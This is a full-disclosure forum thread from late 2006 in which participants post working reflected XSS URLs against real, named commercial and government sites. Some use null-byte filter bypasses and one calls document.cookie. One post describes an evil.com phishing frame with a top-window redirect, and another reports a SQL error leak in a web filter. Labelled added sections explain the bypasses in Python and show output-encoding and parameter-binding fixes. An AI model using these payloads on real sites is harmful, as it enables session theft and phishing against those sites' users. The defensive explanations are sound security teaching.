Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 34 of 65
Re: So it begins
Posted by: maluc
Date: December 23, 2006 02:43PM

Yeah, although it's not a redirect per se... I'd agree that it was the best place for it, because you can still make a JavaScript redirect out of it: put evil.com/phish.html in the frame, and in phish.html include <script>top.location=document.location</script>

That's quite a run-on. The link I put here, though, is indeed XSS.

-maluc

Re: So it begins
Posted by: eyeced
Date: December 23, 2006 02:55PM

Does the myspace xss have you stumped maluc?

This is going into general chat now, so I'll stop, don't worry. But it was killing me yesterday; I haven't looked since.

Re: So it begins
Posted by: maluc
Date: December 23, 2006 03:24PM

As in the body onload one?

I haven't looked at it since, actually... but I will later on (a bit busy with other stuff right now).

But in the meantime, use the one disenchant posted.

-maluc

Re: So it begins
Posted by: maluc
Date: December 24, 2006 01:59PM

http://developers.sun.com/contact/thankyou.jsp?dlink=&lname=&mesg=Please+visit+our+%3Cscript%3Ealert(%22Use%20C%23%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: rsnake
Date: December 24, 2006 04:04PM

A couple from Alf...

http://www.youtube.com/signup?signup_type=c%00'%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.amazon.com/Loose-Nelly-Furtado/dp/B000FII324/sr=8-1/qid=1166713625/ref=pd_bbs_sr_1/105-2518086-1118822?ie=UTF7&s=music%00'%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: December 24, 2006 04:17PM

Interesting Amazon one. The YouTube one doesn't need the %00, but I don't get why the Amazon one does require it. Does the input sanitization function stop searching for evil input after a null byte?

If so that's a very good find.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: kefka
Date: December 24, 2006 04:23PM

Nice finds; another XSS on YouTube came across the Full-Disclosure mailing list today.

http://seclists.org/fulldisclosure/2006/Dec/0436.html

Re: So it begins
Posted by: jungsonn
Date: December 25, 2006 06:29PM

@WhiteAcid, yeah, they sure are the perfect pair sometimes. Most of the time when I find some, it saves me a lot of time to just insert a null and start pounding filters.

I don't know the exact code structure, but I guess s=music%00 will break the filter on var 's' and so it ignores the script after that. Maybe that var 's' is being echoed back to the page, and so is the script.

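The mechanism WhiteAcid asks about and jungsonn guesses at can be shown directly. The following is an added example, not code from this thread or from any of the sites named in it: a hypothetical blacklist check that operates on a NUL-terminated C string (modelled with ctypes.c_char_p, which reads a buffer with the same semantics as C's strstr()) sees only the bytes before the %00, while the hypothetical template code that echoes the parameter copies the full length-delimited buffer. The sample query value is the URL-decoded form of the posted Amazon parameter; the function names and the blacklist contents are assumptions.

```python
import ctypes
import html
import re

# Constructed sample: URL-decoded form of the posted value
#   s=music%00'%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
PAYLOAD = b"music\x00'\"><script>alert(\"XSS\")</script>"

# Assumed blacklist of a hypothetical legacy filter.
BLACKLIST = (b"<script", b"javascript:", b"onerror=")


def c_string_view(buf: bytes) -> bytes:
    """What a C routine such as strstr() sees: the bytes up to the first NUL.
    ctypes.c_char_p reads the buffer with exactly those NUL-terminated semantics."""
    return ctypes.c_char_p(buf).value or b""


def blacklist_passes_cstring(buf: bytes) -> bool:
    """Hypothetical legacy filter: a substring check over a C string.
    Returns True if the value is allowed through. Bytes after the NUL are invisible."""
    visible = c_string_view(buf).lower()
    return not any(bad in visible for bad in BLACKLIST)


def echo_unescaped(buf: bytes) -> str:
    """Hypothetical template sink: copies the whole length-delimited buffer into
    the page, the way the search page echoed the 's' parameter."""
    return "<p>Results for: " + buf.decode("latin-1") + "</p>"


def page_has_live_script(page: str) -> bool:
    """Crude check for a script element that a browser would execute."""
    return re.search(r"<script[\s>]", page, re.I) is not None


def hardened_passes(buf: bytes) -> bool:
    """Fix 1: canonicalise first. A NUL byte has no business in a query string,
    so reject it outright, and run the check over the full buffer rather than a
    C-string view of it."""
    if b"\x00" in buf:
        return False
    return not any(bad in buf.lower() for bad in BLACKLIST)


def echo_escaped(buf: bytes) -> str:
    """Fix 2: the actual defence is output encoding at the sink, regardless of
    what the input filter concluded. html.escape covers < > & and both quotes."""
    return "<p>Results for: " + html.escape(buf.decode("latin-1")) + "</p>"


def demonstrate() -> dict:
    """Run the payload through both the legacy and the hardened paths."""
    return {
        "legacy_filter_allowed": blacklist_passes_cstring(PAYLOAD),
        "legacy_page_executes": page_has_live_script(echo_unescaped(PAYLOAD)),
        "hardened_filter_allowed": hardened_passes(PAYLOAD),
        "hardened_page_executes": page_has_live_script(echo_escaped(PAYLOAD)),
    }


if __name__ == "__main__":
    print("filter sees:", c_string_view(PAYLOAD))
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

Both fixes are shown because they address different failures: rejecting NUL (or stripping it) before any check runs closes the gap between what the filter and the sink see, while encoding at the output sink is what actually stops the injection whether or not a blacklist ever agrees with the template layer.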
Re: So it begins
Posted by: eyeced
Date: December 26, 2006 05:12AM

http://www.dixons.co.uk/martprd/store/dix_page.jsp?BV_SessionID=@@@@1485948722.1167131332@@@@&BV_EngineID=ccccaddjkedfdhdcflgceggdhhmdfin.0&criterion=%3cscript%3ealert('xss')%3b%3c%2fscript%3e&low_bound=0&AtimeStamp=3344367536&page=SimpleSearchProducts&up_bound=0

http://www.netgear.com/Search.aspx?text=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

The Netgear one is quite horrendous actually, as the filter does absolutely nothing. The Dixons one, as with PC World, filters script src and some other vectors; I didn't post the PC World one as I'm pretty sure I may have seen it already posted.

Re: So it begins
Posted by: eyeced
Date: December 26, 2006 06:12AM

http://exit.uk.com/show_products.asp?b=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

1000th post... Crikey.

http://www.boots.com/guidedsearch/newsearch.jsp?searchArea=1&searchTerm=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&Go.x=0&Go.y=0&uri=%2Fguidedsearch%2Fnewsearch.jsp&classificationId=&contentId=&articleId=&N=0&Ntk=all&Nty=1

It's crazy how many of the big shopping sites are vulnerable to XSS.

Just a thought, but wouldn't it be better if you could restrict this forum to members only, or members with a certain post count? At the moment any random phisher could just use one of these holes to exploit the fuck out of some 94-year-old guy wishing to purchase a tele (Dixons), who then decides he may need some aftershave (Boots). You may not like the idea, but I just think that maybe we're just supplying the phishers with the maggots at the moment.

This topic is now rapidly becoming a database of the holes in some of (if not the) biggest websites on the 'net, therefore anyone needing XSS in a website is just able to search this. I don't really know which way I sway on this actually; I just thought I'd bring it up for discussion.



Edited 2 time(s). Last edit at 12/26/2006 06:42AM by eyeced.

Re: So it begins
Posted by: bubbles
Date: December 26, 2006 12:13PM

If you restrict this forum to only certain members doesnt that sort of defeat the purpose of "full disclosure"?

-bubbles
http://webmastertutorials.net

Re: So it begins
Posted by: jungsonn
Date: December 26, 2006 12:42PM

Yes it does, bubbles. That's why full disclosure is such a difficult and ethical discussion.

Re: So it begins
Posted by: nEUrOO
Date: December 27, 2006 05:28PM

Damn, it cannot print well... :/

http://wwwa.accuweather.com/forecast-current-conditions.asp?partner=romain';}alert("XSS");function foo(){var p='&traveler=1&zipChg=1&zipcode=72410&metric=1

http://www.wunderground.com/login.asp?email=%5C%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3C%5C%22&error=unknownuser&referer=http%3A%2F%2Fwww.wunderground.com

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 4 time(s). Last edit at 12/27/2006 05:39PM by nEUrOO.

Re: So it begins
Posted by: kuza55
Date: December 28, 2006 03:53AM

Haven't posted anything here before because I generally don't bother looking for holes in sites, but I just tested this on impulse:

http://personalweb.about.com/gi/dynamic/offsite.htm?zu=%3C/title%3E%3Cscript%3Ealert('XSS');%3C/script%3E



Edited 1 time(s). Last edit at 12/28/2006 03:56AM by kuza55.

Re: So it begins
Posted by: WhiteAcid
Date: December 28, 2006 09:00PM

http://search.majestic12.co.uk/search.jhh?q=asd%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&f=0

For a search engine to not filter output like that is pretty disappointing :(

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: digi7al64
Date: December 28, 2006 09:08PM

http://onesearch.sun.com/search/onesearch/index.jsp?qt=sun+%27%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0&charset=utf-8&col=developer-reference&rt=true&cs=false

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: unsticky
Date: December 30, 2006 12:58AM

neolodge.com. Haven't posted in a while, though I hate for my most recent post to relate to Neopets :X

Re: So it begins
Posted by: Luny
Date: December 31, 2006 05:59AM

After stumbling upon some web filtering software called Surfwall, I managed to find this:

XSS:

http://queryhome.webwall.net/webcat/accesspolicy.asp?cat=53&url=0&Matched=<script>alert('xss')</script>

Normal:

http://queryhome.webwall.net/webcat/accesspolicy.asp?cat=53&url=0&Matched=ha.ckers.org


Oh, and this lovely error pops up when not using an integer in cat.


Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E10)
[Microsoft][ODBC Microsoft Access Driver] Too few parameters. Expected 1.
/webcat/accesspolicy.asp, line 26


Page:
GET /webcat/accesspolicy.asp


Now to make a patch for the program itself to disable filtering :P

I wonder if I should make my 404 pages on my website redirect there for a laugh.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com



Edited 1 time(s). Last edit at 12/31/2006 06:02AM by Luny.

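The "Too few parameters. Expected 1" error Luny quotes is what the Jet/ODBC driver reports when the SQL text contains a name it cannot resolve: it treats the bare token as a query parameter it was never given. A non-numeric cat value producing that error therefore means the value reaches the SQL text unquoted rather than as a bound parameter. As an added, constructed model (SQLite standing in for Access, not Surfwall's code; the table, its rows and the function names are assumptions), this shows the concatenating pattern beside the bound one and how each responds to a non-integer value.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the filter's category table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT, blocked INTEGER)"
    )
    conn.executemany(
        "INSERT INTO categories VALUES (?, ?, ?)",
        [(53, "hacking", 1), (12, "weather", 0)],
    )
    return conn


def lookup_concatenated(conn: sqlite3.Connection, cat: str) -> list:
    """Vulnerable pattern: the request value is pasted into the SQL text.
    A non-numeric value is parsed as an identifier and the database complains
    about it (SQLite: 'no such column'; Jet/ODBC: 'Too few parameters. Expected 1')."""
    return conn.execute(
        f"SELECT name, blocked FROM categories WHERE id = {cat}"
    ).fetchall()


def lookup_bound(conn: sqlite3.Connection, cat: str) -> list:
    """Fixed pattern: validate the type, then bind. The value never becomes SQL,
    and a non-integer simply matches nothing instead of producing a driver error."""
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    return conn.execute(
        "SELECT name, blocked FROM categories WHERE id = ?", (cat_id,)
    ).fetchall()


def probe(cat: str) -> dict:
    """Run one request value through both patterns and report what each does."""
    conn = make_db()
    try:
        concatenated, error = lookup_concatenated(conn, cat), None
    except sqlite3.Error as exc:
        concatenated, error = None, str(exc)
    return {
        "concatenated": concatenated,
        "concatenated_error": error,
        "bound": lookup_bound(conn, cat),
    }


if __name__ == "__main__":
    for value in ("53", "abc"):
        print(value, probe(value))
```

Whether the concatenating form is further exploitable depends on the rest of the query and on the driver, but the diagnostic and the fix do not change: a database error on non-numeric input is the tell that the value is being built into the statement, and binding plus type validation removes both the error and the exposure.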
Re: So it begins
Posted by: kuza55
Date: December 31, 2006 07:18AM

I'm wondering, do most web filters block websites completely, or just some pages? Because if they only block some pages then that could be an excellent way to attack every single website with partially blocked content.

Re: So it begins
Posted by: bubbles
Date: December 31, 2006 07:56AM

I noticed with Websense (the filter used at my school) that they only blocked pages. So for example myspace.com was blocked, but ww1.myspace.com was not.

Also, they blocked a jokes website I have. Then one day the server was running slow, so I requested a server change from my host, thus changing the IP. I was able to visit my site for about 2 days, lol, before they blocked the new IP.

-bubbles
http://webmastertutorials.net

Re: So it begins
Posted by: Luny
Date: December 31, 2006 01:49PM

kuza55 Wrote:
-------------------------------------------------------
> I'm wondering, do most web filters block websites
> completely, or just some pages? Because if they
> only block some pages then that could be an
> excellent way to attack every single website with
> partially blocked content.

Well, I don't know about all of them, but that program I was testing, Surfwall, blocked pages based on meta tag keywords and titles.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: digi7al64
Date: January 01, 2007 07:28PM

http://www.newsvine.com/_tools/user/login?popoff&redirect=%22><script>alert('xss');</script><%22

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/01/2007 07:34PM by digi7al64.

Re: So it begins
Posted by: cheney_usa
Date: January 01, 2007 08:48PM

A few I found:

http://www.sendspace.com/
XSS in description field for a site that is supposed to securely transfer files.

http://roswell.asftus.com/employee/j_security_check
XSS in the username field. Classic.

http://www.pricechallenger.com/cgi-bin/register?forgot=1&app=chall
XSS in the company field. Not much of a challenge there from the price challenger.

http://www.columbustax.net/e_file/screen_help/welcome.asp
XSS in the search field. Your Ohio tax dollars at work.

https://www.gocybercamp.org/grownups/forgot_password.php
Send your kids to this camp to learn XSS.

Re: So it begins
Posted by: jrhanson
Date: January 02, 2007 02:50AM

New user here,
trying actually to protect my company. Seems like a new vendor has several holes;
see http://www.euclidtechnology.com/about/contact.shtml
The custom form with first and last names shows escape in
http://support.euclidtechnology.com/cgi-bin/memberdll.dll/AddProspect
Can people let me know how bad this is?
Thanks,
Jono

Re: So it begins
Posted by: jungsonn
Date: January 02, 2007 06:37AM

You need to protect a contact form from automated submission? I usually use a fingerprint session here, to see if it's a bot or a regular user. Use a JavaScript and server-side combination to prevent auto-submitting, and escape bad chars. I can't see what you are doing with it on your server: is it mailed only? And does it go into a database?

Re: So it begins
Posted by: WhiteAcid
Date: January 02, 2007 03:36PM

jungsonn, I think he's asking what dangers that contact form poses, as it's vulnerable to XSS.

Well... actually, it seems it was. There is now a maxlength enforced before output which is too short to be exploited, and since lastname isn't output I think XSS fragmentation isn't doable (though I didn't test the other fields).

As for what XSS can do, there was a good post on that somewhere, but I can't immediately remember where; maybe someone else can.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: jungsonn
Date: January 02, 2007 08:31PM

OK, I got stuck on the "new user here, trying actually to protect my company" part ^^

Re: So it begins
Posted by: cx1
Date: January 02, 2007 11:24PM

http://search.cnn.com/pages/search.jsp?query=""%20onclick=alert('xss')%20iframe



Edited 1 time(s). Last edit at 01/02/2007 11:27PM by cx1.

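nEUrOO's accuweather URL, kuza55's about.com URL and cx1's cnn.com URL above each work because the reflected value lands in a different parsing context: a JavaScript string literal (so the payload closes the quote and the enclosing function, runs alert, and reopens both so the script still parses), RCDATA inside <title> (where a bare <script> would be inert, hence the leading </title>), and a quoted attribute (where one stray quote is enough to add an onclick handler, no <script> needed). An added example, not from the thread or from any of those sites: a hypothetical page that reflects three values into those three contexts, a per-context escaper, and an HTMLParser-based probe that checks what a browser would actually get. The payload strings are URL-decoded copies of the posted ones; the page markup, the function names and the probe are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed values, URL-decoded from the three posted payloads.
JS_CONTEXT_PAYLOAD = "romain';}alert(\"XSS\");function foo(){var p='"  # lands in a JS string
TITLE_PAYLOAD = "</title><script>alert('XSS');</script>"               # lands inside <title>
ATTR_PAYLOAD = "\"\" onclick=alert('xss') iframe"                       # lands in value="..."


def escape_js_string(s: str) -> str:
    """Escape for a JS string literal in an inline <script>. Every non-alphanumeric
    ASCII character becomes \\xHH, so quotes, braces, ';' and '<' can never end the
    literal, the statement or the <script> element. Non-Latin-1 becomes \\uHHHH."""
    out = []
    for ch in s:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code < 0x100:
            out.append(f"\\x{code:02x}")
        else:
            out.append(f"\\u{code:04x}")
    return "".join(out)


def render(partner: str, title: str, query: str, escape: bool) -> str:
    """Hypothetical page reflecting three values into three contexts.
    With escape=True each value gets the encoder for its own context."""
    if escape:
        title = html.escape(title)        # RCDATA: escaping < and & is sufficient
        query = html.escape(query)        # attribute: must be quoted AND escaped
        partner = escape_js_string(partner)  # JS string: html.escape is the wrong tool
    return (
        f"<html><head><title>Search: {title}</title></head><body>"
        f"<input name=\"query\" value=\"{query}\">"
        f"<script>var partner='{partner}';function foo(){{var p='x';}}</script>"
        "</body></html>"
    )


class _Probe(HTMLParser):
    """Collect what the browser would see: start tags, <input> attributes,
    and the text of every <script> element."""

    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs.append(dict(attrs))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def analyse(page: str) -> dict:
    """Report the three injection symptoms a browser would act on."""
    p = _Probe()
    p.feed(page)
    p.close()
    return {
        "script_tags": p.tags.count("script"),
        "event_handler_on_input": any(k.startswith("on") for a in p.input_attrs for k in a),
        "alert_in_script_code": any("alert(" in s for s in p.scripts),
    }


if __name__ == "__main__":
    for escape in (False, True):
        page = render(JS_CONTEXT_PAYLOAD, TITLE_PAYLOAD, ATTR_PAYLOAD, escape)
        print("escaped" if escape else "naive", analyse(page))
```

The JS escaper is deliberately aggressive: rather than a blacklist of quote and brace characters, it hex-escapes every non-alphanumeric ASCII byte, so other breakout sequences (</script>, line terminators, backticks) are covered without a rule per character. Two caveats worth keeping in mind: html.escape is the wrong encoder for the script context, since `\'` and `&#x27;` mean different things there, and escaping an attribute value only helps if the template actually quotes the attribute.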
Re: So it begins
Posted by: digi7al64
Date: January 03, 2007 12:30AM

http://computerworld.com/action/search.do?command=advancedSearch&readMoreContentId=&trackTerm=&searchTerms=%22%3B+alert%28%27xss%27%29%3B+var+d%3D%22&sortBy=&viewBy=&fromDateMonth=0&fromDateDay=1&fromDateYear=2000&resultsPerPage=10&toDateMonth=0&toDateDay=3&toDateYear=2000&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: jrhanson
Date: January 04, 2007 06:42PM

Thanks WhiteAcid and jungsonn,
I created my own form to remove any client-side validation on the euclidtechnology.com site, then noticed it returned at least the first name, and it allowed image tags and other injection. The DLL seemed to block the standard XSS alert boxes (although they may have popped up on the server?).
At this point I will just inform them that they have HTML injection and indicate that it is probably worse.
Thanks for your help!
-jrhanson
